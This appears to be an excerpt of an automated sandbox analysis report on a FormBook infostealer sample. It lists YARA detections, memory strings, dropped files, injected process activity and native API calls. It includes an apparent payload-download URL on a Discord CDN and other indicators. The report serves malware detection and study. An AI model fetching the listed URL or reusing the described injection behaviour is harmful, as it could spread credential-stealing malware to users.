          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.325491375.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attac0
          Source: Ijxldrv.exe, 00000007.00000002.322506056.00000000034A0000.00000004.00000001.sdmp | String found in binary or memory: https://cdn.discordapp.com/attachments/720370823554138118/766538674925862932/Ijxlvnm
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/chrome/
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png4_
          Source: NETSTAT.EXE, 00000011.00000002.491162307.000000000070A000.00000004.00000020.sdmp | String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE

          System Summary:

          Detected FormBook malware
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logri.ini
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\4201TS0U\420logrv.ini
          Malicious sample detected (through community Yara rule)
          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.363576083.0000000000870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.347301102.0000000010411000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.489865505.0000000000610000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.399200553.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.255722131.0000000010411000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.490058063.0000000000640000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.367185514.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.488550629.00000000001C0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.401382635.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.347219785.0000000003E40000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.333441854.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.352439392.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.372602980.0000000010410000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.399815412.00000000049D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.324932466.0000000003D3C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.333947953.0000000000DC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000002.366016750.0000000003060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.400259752.0000000000A30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.254839755.0000000003F16000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.324842296.0000000003D00000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.347253674.0000000003E7C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 12.2.Ijxldrv.exe.10410000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 18.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Ijxlcmh_Signed_.exe.10410000.7.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C795D0 NtClose,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79540 NtReadFile,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C796E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C797A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C798F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C799A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C795F0 NtQueryInformationFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79560 NtWriteFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79520 NtWaitForSingleObject
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C7AD30 NtSetContextThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C796D0 NtCreateKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79650 NtQueryValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79670 NtQueryInformationProcess
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79610 NtEnumerateValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79FE0 NtCreateMutant
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79760 NtOpenProcess
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C7A770 NtOpenThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79770 NtSetInformationFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C7A710 NtOpenProcessToken
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79730 NtQueryVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C798A0 NtWriteVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C7B040 NtSuspendThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79820 NtEnumerateKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C799D0 NtCreateProcessEx
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79950 NtQueueApcThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79A80 NtOpenDirectoryObject
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79A10 NtQuerySection
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C7A3B0 NtGetContextThread
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C79B00 NtSetValueKey
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_1042A050 NtClose
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_1042A100 NtAllocateVirtualMemory
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10429F20 NtCreateFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10429FD0 NtReadFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_1042A04A NtClose
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10429F1A NtCreateFile
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10429FCA NtReadFile
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 0_3_02239291
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 0_3_02238690
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 0_3_02238698
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 0_3_02243D9C
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 0_3_0222B340
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exe | Code function: 0_3_0222B348
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04CFD466
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C4841F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D025DD
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C4D5E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D01D55
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D02D07
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C30D20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D02EF7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04CFD616
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C56E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D01FF1
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D028EC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C4B090
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C620A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D020A8
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04CF1002
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D0E824
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C3F900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C54120
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D022AE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04CFDBD2
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04C6EBB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_04D02B28
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_1042E81B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10411026
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_10411030
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 2_2_1042D8D7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042D1662_2_1042D166
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042E3602_2_1042E360
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10412D872_2_10412D87
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10412D902_2_10412D90
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10419E2B2_2_10419E2B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10419E302_2_10419E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042D7792_2_1042D779
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10412FB02_2_10412FB0
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_022192917_3_02219291
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_022186907_3_02218690
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_022186987_3_02218698
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_02223D9C7_3_02223D9C
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_0220B3407_3_0220B340
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_0220B3487_3_0220B348
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0268929112_3_02689291
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0268869812_3_02688698
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0268869012_3_02688690
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_02693D9C12_3_02693D9C
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0267B34012_3_0267B340
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0267B34812_3_0267B348
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 04C3B150 appears 35 times
          Source: Ijxlcmh_Signed_.exeStatic PE information: invalid certificate
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253344471.0000000003810000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Ijxlcmh_Signed_.exe
          Source: Ijxlcmh_Signed_.exe, 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe
          Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253367376.0000000003990000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Ijxlcmh_Signed_.exe
          Source: Ijxlcmh_Signed_.exeBinary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
